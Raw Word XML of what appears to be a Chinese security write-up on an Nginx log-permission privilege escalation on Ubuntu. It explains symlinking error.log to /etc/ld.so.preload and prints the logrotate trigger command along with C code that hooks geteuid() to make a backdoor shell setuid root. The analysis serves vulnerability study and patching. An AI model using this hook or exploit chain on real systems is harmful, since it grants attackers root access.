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A83" w:rsidRDefault="00F44905" w:rsidP="00541ECC">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="636A73"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="636A73"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ubuntu 14.04: Nginx1.4.6-1ubuntu3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r w:rsidRPr="00F44905">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意者可通过软链接任意文件来替换日志文件，从而实现提权以获取服务器的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44905">
        <w:t xml:space="preserve"> root 权限，执行 PoC 后结果如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15C4A20F" wp14:editId="5BBAA1CB">
            <wp:extent cx="4413250" cy="3304359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5578" cy="331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905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r w:rsidRPr="00F44905">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示要等待，但我们可以通过如下命令进行触发：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r w:rsidRPr="00F44905">
        <w:t>/usr/sbin/logrotate -vf /etc/logrotate.d/nginx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r w:rsidRPr="00F44905">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权后的结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C59E34C" wp14:editId="017E10E9">
            <wp:extent cx="4438650" cy="2911361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5704" cy="291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905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r w:rsidRPr="00F44905">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般来说，如果想要修改函数的功能，最直接的就是对其源码进行更改，但很多情况下我们是无法达成此目标的，这时就可以借助一些</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44905">
        <w:t>hook操作来改变程序的流程，从而实现对函数的修改。在 Linux 系统下，我们可以通过编译一个含相同函数定义的 so 文件并借助/etc/ld.so.preload文件来完成此操作，系统的 loader 代码中会检查是否存在/etc/ld.so.preload 文件，如果存在那么就会加载其中列出的所有 so 文件，它能够实现与 LD_PRELOAD 环境变量相同的功能且限制更少，以此来调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44905">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们定义的函数而非原函数。此方法适用于用户空间的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44905">
        <w:t>so文件劫持，类似于 Windows 下的 DLL 劫持技术。更进一步，如果我们将此技巧与含有suid的文件结合起来，那么就可以很自然的实现提权操作了，所给的 PoC 就是利用的这个技巧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRPr="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRPr="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r w:rsidRPr="00F44905">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44905">
        <w:t xml:space="preserve"> hook 操作，简单来看就是如下的一个执行流程：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541ECC" w:rsidRDefault="00F44905" w:rsidP="00541ECC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44365F2D" wp14:editId="4CCC7C47">
            <wp:extent cx="4102100" cy="2740001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7778" cy="275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905" w:rsidRDefault="00F44905" w:rsidP="00541ECC">
      <w:r w:rsidRPr="00F44905">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44905">
        <w:t xml:space="preserve"> PoC 利用中与此相关的 C 代码如下所示，如果将其编译成so文件并把路径写入到/etc/ld.so.preload文件的话，那么可以实现对 geteuid()函数的 hook，在 hook 调用中就能执行我们想要的恶意操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t>#define _GNU_SOURCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t>#include &lt;sys/stat.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t>#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t>#include &lt;dlfcn.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t>#include &lt;sys/types.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t>#include &lt;sys/stat.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t>#include &lt;fcntl.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905"/>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t>/*hook原geteuid()函数*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t>uid_t geteuid(void) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t xml:space="preserve">    //定义函数指针变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t xml:space="preserve">    static uid_t  (*old_geteuid)();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    //返回原geteuid()函数的指针</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t xml:space="preserve">    old_geteuid = dlsym(RTLD_NEXT, "geteuid");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t xml:space="preserve">    //在调用原geteuid()函数的同时执行想要的恶意操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t xml:space="preserve">    if ( old_geteuid() == 0 ) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t xml:space="preserve">        chown("$BACKDOORPATH", 0, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t xml:space="preserve">        chmod("$BACKDOORPATH", 04777);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t xml:space="preserve">        unlink("/etc/ld.so.preload");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t xml:space="preserve">    return old_geteuid();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r w:rsidRPr="00F44905">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以将上述代码编译后来做个简单的测试，结果如下图，观察</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44905">
        <w:t xml:space="preserve"> nginxrootsh 文件前后属性的变化以及/etc/ld.so.preload文件存在与否可以判断我们的恶意操作是否执行了，很显然 hook 是成功的，和 PoC 相同这里也是通过sudo来触发hook调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77494668" wp14:editId="091EBD39">
            <wp:extent cx="4349750" cy="259906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0056" cy="260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905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r w:rsidRPr="00F44905">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来我们考虑下如何将内容写进</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44905">
        <w:t>/etc/ld.so.preload文件，也就是本次漏洞的所在，Nginx 在配置 log 文件时采用的不安全权限设置使得我们能很容易的实现此目的，从而实现 www-data 到 root 的权限提升。为了看的更清楚，我们首先将目录/var/log/nginx/下的文件全部删除，再重启下 nginx 服务，最后执行如下两条命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4777056D" wp14:editId="4C180A4D">
            <wp:extent cx="3923809" cy="380952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905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r w:rsidRPr="00F44905">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时得到的结果如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AF9AC37" wp14:editId="17EC2E8E">
            <wp:extent cx="4013200" cy="1778061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3729" cy="178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905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r w:rsidRPr="00F44905">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44905">
        <w:t xml:space="preserve"> error.log 文件的属性为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A86F5CB" wp14:editId="799D06E4">
            <wp:extent cx="3685714" cy="14285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905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将其软链接到</w:t>
      </w:r>
      <w:r>
        <w:t>/etc/ld.so.preload 文件就可以了，这里为了简单测试，我们将其软链接到/etc/xxxxxxxxxx，同样需要上述那两条触发命令。从上图中我们看到了成功结果，此时 www-data 用户是可以对/etc/xxxxxxxxxx文件进行写操作的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>至此，我们将这些点结合起来就可以实现对此漏洞的利用了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905"/>
    <w:p w:rsidR="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44905" w:rsidRPr="00F44905" w:rsidRDefault="00F44905" w:rsidP="00F44905">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新软件之最新版</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00F44905" w:rsidRPr="00F449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7914" w:rsidRDefault="00417914" w:rsidP="00541ECC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00417914" w:rsidRDefault="00417914" w:rsidP="00541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7914" w:rsidRDefault="00417914" w:rsidP="00541ECC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00417914" w:rsidRDefault="00417914" w:rsidP="00541E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FB1"/>
    <w:rsid w:val="00417914"/>
    <w:rsid w:val="00491FC5"/>
    <w:rsid w:val="00541ECC"/>
    <w:rsid w:val="006B1FB1"/>
    <w:rsid w:val="00A05AAA"/>
    <w:rsid w:val="00F4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C901B9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4B92DEAC-047C-4193-9E31-82AB57EE6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41E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1E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1E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1E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1EC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41EC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Wang (王磊)-浪潮信息</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lei Wang (王磊)-浪潮信息</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-17T06:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-17T08:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>